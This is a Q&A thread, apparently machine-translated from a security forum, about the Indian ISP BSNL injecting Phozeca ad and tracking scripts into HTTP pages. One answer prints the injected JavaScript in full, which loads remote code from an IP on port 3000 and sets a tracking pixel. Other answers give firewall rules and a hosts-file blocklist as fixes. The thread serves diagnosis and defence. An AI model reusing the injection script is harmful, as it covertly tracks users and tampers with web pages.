我的 ISP(BSNL India)正在使用 Phozeca 注入广告,这会破坏网站并使其无响应,有什么办法吗?

信息安全 注射
2021-09-07 02:15:28

我最近遇到了一个问题,我的 ISP (BSNL India) 一直在向我的浏览器注入广告/奇怪的 Javascript 跟踪代码,导致网站无法使用且无响应。

我也写了一篇关于这个的文章:https ://www.nonstoptrend.com/bsnl-is-injecting-adsscripts-onto-your-browser-using-phozeca-2017/

您可以阅读它以了解究竟发生了什么。可以参考上面的文章,看看注入的代码是干什么的。

我确定这是我的 ISP,因为域以“bsnl.phozeca.com”开头并使用端口“3000”。

注意事项:-

  • 脚本注入仅适用于非 HTTPS 网站,例如 Steam 商店和其他非 HTTPS 网站。
  • 注入的代码使用端口 3000。
  • 在浏览器中禁用 CSP(内容安全策略)时,故障网站正常运行。
  • 出现故障的网站可以在 Tor 浏览器上正常运行。
  • 我个人对这件事进行了调查,并且在阅读了代码之后(阅读我的文章以了解我在说什么),并且在阅读了代码之后,我从代码中调用了“loadnewads()”函数,并且一旦它调用时,会出现奇怪的广告,例如虚假的 Flash 播放器广告和虚假的下载按钮。

-我试图解决这个问题的事情。-

  1. 检查主机文件并阻止域:不起作用。该脚本仍在注入中。
  2. 扫描 PC 中的恶意软件:不工作。我已经用包括 Malwarebytes 在内的三个以上的防病毒软件进行了扫描,但它仍然没有检测到任何东西。
  3. 禁用 CSP(内容安全策略):工作!但是广告会自动开始播放。
  4. 将 DNS 更改为 Google 的 DNS:不起作用。

有没有办法解决这个问题?请帮忙。
谢谢!

4个回答

我有类似的问题。我有一个简单的技巧,但它是暂时的,但它对我有用,并阻止了 BSNL ISP 跟踪和推送恶意软件 AD 弹出窗口。我在我的计算机中为 bsnl.phozeca.com 添加了一个主机条目,并将其指向 localhost。

看起来恶意软件已经进化了。

它现在使用 IP 并将自身注入到“http”网站的 js 文件中(使用代理进行分析)。

例如,对于 bbc.co.uk,当浏览器请求以下 url 时:

http://static.bbc.co.uk/id/0.37.24/modules/idcta/statusbar.js

而不是下面的脚本(原始):

define(["idcta/idCookie","idcta/id-config","idcta/apiUtils"],function(d,c,h){var b={};function e(j){try{this.id=null;this.element=null;this.ctaLink=null;this.ctaName=null;if(f(j)){this.id=j.id;this.element=document.getElementById(j.id);if(!j.blq){this.ctaLink=document.getElementById("idcta-link");this.ctaName=this.element.getElementsByTagName("span")[0]}else{this.ctaLink=document.getElementById(j["link-id"])?document.getElementById(j["link-id"]):this.element.getElementsByTagName("a")[0];this.ctaName=j["name-id"]?document.getElementById(j["name-id"]):this.element.getElementsByTagName("span")[1]}var i=this;if(j.publiclyCacheable===true){if(d.getInstance().hasCookie()){if(c.status_url&&i.ctaLink.href!==c.status_url){i.ctaLink.href=c.status_url}a(i,d.getInstance())}else{if(c.signin_url){i.ctaLink.href=c.signin_url}i.ctaName.innerHTML=c.translation_signedout}}}}catch(k){h.logCaughtError(k)}}function a(m,k){try{var j=k.getNameFromCookie()||c.translation_signedin;var i=c.translation_signedin;if(j){i=g(j,14)}m.element.className=m.element.className+" idcta-signedin";m.ctaName.innerHTML=i}catch(l){h.logCaughtError(l)}}function g(j,i){if(j.length>i){return j.substring(0,i-1)+"…"}return j}function f(i){if(!document.getElementById(i.id)){return false}if(!i.blq&&!document.getElementById("idcta-link")){return false}if(i.blq&&!document.getElementById(i["link-id"])){return false}return true}b.Statusbar=e;b.updateForAuthorisedState=a;return b});

恶意软件(isp-end?)注入了以下 js 恶意脚本:

!function(){var a="/id/0.37.24/modules/idcta/statusbar.js",r=null,e=document.getElementsByTagName("script"),i=e.length,n=null,t=Date.now(),s=null,o=0;for("/"===a.substring(0,1)&&(a=a.substring(1)),o=0;o<i;o+=1)
if(void 0!==e[o].src&&null!==e[o].src&&e[o].src.indexOf(a)>-1){n=o,r=e[o];break}
void 0!==r&&null!==r||(r=document.getElementsByTagName("script")[0]),s=r.src.indexOf("?")>-1?r.src+"&cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag":r.src+"?cb="+t.toString()+"&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";try{if(void 0===window.sarazasarazaNoti||null===window.sarazasarazaNoti||window.sarazasarazaNoti===Array&&window.sarazasarazaNoti.indexOf(r.src)<0){void 0!==window.sarazasarazaNoti&&null!==window.sarazasarazaNoti||(window.sarazasarazaNoti=new Array),window.sarazasarazaNoti.push(r.src);var c=r.parentNode,d=r;if(r.async||r.defer||null!==n&&n!==e.length-1){var w=document.createElement("script");w.src=s,c.replaceChild(w,d)}else document.write("<script type='text/javascript' src="+s+"><\/script>"),c.removeChild(d)}
var a1="117.254.84.212";var a2="3000";if(window===window.top&&(void 0===window.sarazasaraza||null===window.sarazasaraza||!window.sarazasaraza)){window.sarazasaraza=!0;var l=a1+":"+a2+"/getjs?nadipdata="+JSON.stringify("%7B%22url%22:%22%2Fid%2F0.37.24%2Fmodules%2Fidcta%2Fstatusbar.js%22%2C%22referer%22:%22http:%2F%2Fwww.bbc.com%2F%22%2C%22host%22:%22static.bbc.co.uk%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D")+"&screenheight="+screen.height+"&screenwidth="+screen.width+"&tm="+(new Date).getTime()+"&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0";!function(a,r,e,i,n,t,s){t=r.createElement(e),s=r.getElementsByTagName(e)[0],t.async=!0,t.src=i,s.parentNode.insertBefore(t,s)}(window,document,"script","//"+l)}
var imgtag=document.createElement('img');imgtag.height='1';imgtag.width='1';imgtag.style='border-style:none;';imgtag.alt='';imgtag.src='//'+a1+":"+a2+"/pixel/1x1.png"}catch(a){}}()

有效的修复是在防火墙中添加一条规则,以阻止 bsnl 范围内的端口 3000:117.192.0.0 117.255.255.255(基于超 DNS 的信息)。

在系统级别和 asdl-router 级别都这样做了(因为使用网络的移动设备也会受到影响)。

希望这将最大限度地减少与使用端口 3000 的其他应用程序的冲突。

对于 Windows,可以在此处找到有关阻塞端口的视频: https ://www.youtube.com/watch?v=KA8BIshUcXw

印度-包容性峰会-20192019 年 11 月 17 日更新 -在一段时间不活动后启动浏览器时,偶尔会在 http 链接上获取以下图像 ( )。

2018 年 11 月 28 日更新:很高兴(并且松了一口气)在“ https://pgportal.gov.in ”上注册申诉后问题已得到解决,随后 BSNL BB-NOC 团队联系并添加了用户 ID(对应于服务)到免打扰(可能需要一两天的时间来反映变化)。在他们回复时,门户网站本身的不满大约有一个月之久 - 尽管他们可能试图联系但无法联系到。

注意:注册标准线路连接投诉无效。BSNL 团队关闭了罚单,称互联网正在运行(尽管确实表明广告是设计使然)。

首先尝试与您的 ISP 相处以停止这样做(如果适用)

正如您所提到的,HTTPS 不能被破坏,这应该是,所以尽量使用 HTTPS。

关于您的下一次尝试

1)检查主机文件并阻止域:不起作用。该脚本仍在注入中。

必须工作,如果没有,那么你做错了。另一种方法是使用调制解调器或路由器域/IP 块(或防火墙)阻止相同的事情

如果您的 ISP 足够聪明,它应该托管具有不同域名的脚本,因此对您来说很难阻止所有这些脚本。

2) 扫描 PC 中的恶意软件

当然行不通

3) 禁用 CSP(内容安全策略)

不知道这是什么,但由于 HTTP 的安全性为零,因此该 CSP 可能会被愚弄,或/并且不能说内容是否不允许(什么逻辑?)

4) 将 DNS 更改为 Google 的 DNS

当然行不通,您遇到的问题是关于post dns。即使您的 ISP 通过域解析覆盖了结果,将 add 放在 http 中仍然很简单。

100% 有效的解决方案
使用 VPN 或 sTunnel 绑定到后面的 squid 等服务。如果您的 ISP 发现您与目标 ip(VPN 或 sTunnel)的连接作为其反广告策略,这将无法正常工作。

50% 可行的解决方案
通过您的浏览器广告拦截(或其他任何内容)插件阻止所有内容。

正如 Preetam 建议的那样 - 添加更多细节。

  1. 我从http://winhelp2002.mvps.org/hosts.zip下载了主机文件 将 其替换在此位置 C:\Windows\System32\drivers\etc

  2. 如果您不知道如何替换主机文件,那么您可以按照此说明进行操作 http://winhelp2002.mvps.org/hostswin8.htm

  3. 为了摆脱 engine.spotscenered.info/link.engine?guid= 的弹出窗口,我在主机文件中添加了以下条目:

    0.0.0.0 www.onclickmax.com
    0.0.0.0 bsnl.phozeca.com
    0.0.0.0 *.onclickmax.com
    0.0.0.0 phozeca.com
    0.0.0.0 c.phozeca.com

我没有看到任何弹出广告...消失了!